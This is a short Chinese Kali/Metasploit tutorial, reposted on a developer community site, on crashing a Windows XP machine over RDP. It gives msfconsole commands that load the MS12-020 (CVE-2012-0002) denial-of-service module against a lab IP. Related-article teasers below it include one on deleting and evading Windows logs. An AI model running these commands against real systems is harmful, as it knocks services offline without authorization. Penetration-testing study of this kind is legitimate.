AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

kali之入侵XP系统3(非法关闭计算机)

2017-11-15 2012
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

保证网络连通性,配置网络

开启PostgreSQL:  service postgresql start
开启metasploit:  service metasploit start

root@kali:~# msfconsole

wKioL1lTdiLApAAHAAMAwVaZ7zY146.jpg

前提目标主机3389端口开放

msf >search CVE_2012_0002 查找ms12_020漏洞
msf >use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 使用ms12_020漏洞
msf >set rhost 192.168.48.100  定义攻击目标ip
msf >exploit

wKiom1lTdnqwAYhwAANXGA6aXVo276.jpg

wKiom1lTdn-w3_iiAAF8QITif7o729.jpg











本文转自 周小玉 51CTO博客,原文链接:http://blog.51cto.com/maguangjie/1942786,如需转载请自行联系原作者
文章标签:
Windows
余二五
目录
相关文章
李火火
|
安全 测试技术 数据安全/隐私保护
CVE-2022-21999 Windows Print Spooler(打印服务)特权提升漏洞
2021年6⽉29⽇,安全研究⼈员在GitHub上公开了CVE-2021-1675 Windows Print Spooler远程代码执⾏漏洞的PoC。该漏洞是Microsoft 6⽉星期⼆补丁⽇中公开的⼀个RCE漏洞,其存在于管理打印过程的Print Spooler (spoolsv.exe) 服务中,会影响所有 Windows系统版本。
李火火
156 1
狼人2007
|
安全 Windows
高危Windows系统 SMB/RDP远程命令执行漏洞 手工修复办法
 1、Windows Update更新补丁方式: 更新方法:点击“开始”->“控制面板”->“Windows Update” ,点击“检查更新”-“安装更新”:   2、检查安装结果: 点击“查看更新历史记录”,检查安装的补丁: 3、重启系统生效 漏洞参考: https://blogs.
狼人2007
1452 0
狼人2007
|
安全 Windows
【漏洞公告】高危:Windows系统 SMB/RDP远程命令执行漏洞
2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,为了确保您在阿里云上的业务安全,请您关注,具体漏洞详情如下: 漏洞编号: 暂无 漏洞名称: Windows系统多个SMB\RDP远程命令执行漏洞官方评级: 高危 漏洞描述: 国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,可以利用SMB、RDP服务成功入侵服务器。
狼人2007
1644 0
幸运券发放
|
网络协议 Linux
Linux 遭入侵,挖矿进程被隐藏排查记录
Linux 遭入侵,挖矿进程被隐藏排查记录 今天来给大家分享下这两天遇到的一个问题,服务器被挖矿了,把我的排查记录分享下,希望能帮到有需要的同学。 问题原因 多台服务器持续告警CPU过高,服务器为K8s的应用节点,正常情况下CPU使用率都挺低的,通过排查是原因是被挖矿了,下面为定位过程 定位过程 登陆问题主机10.
幸运券发放
3272 0
技术小阿哥
|
安全 测试技术 Windows
安全设置Windows组策略 有效阻止黑客
技术小阿哥
1301 0
余二五
|
Windows
kali之入侵XP系统2
余二五
1371 0
余二五
|
安全
kali之入侵win7系统2
余二五
1529 0
余二五
|
Shell Windows
kali之入侵Win7系统1
余二五
3762 0
科技小能手
|
安全
利用远程来修复本地计算机无法登陆的问题
科技小能手
1017 0
玄学酱
|
监控 Windows
渗透技巧——Windows日志的删除与绕过
本文讲的是渗透技巧——Windows日志的删除与绕过,在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录执行等。
玄学酱
3310 0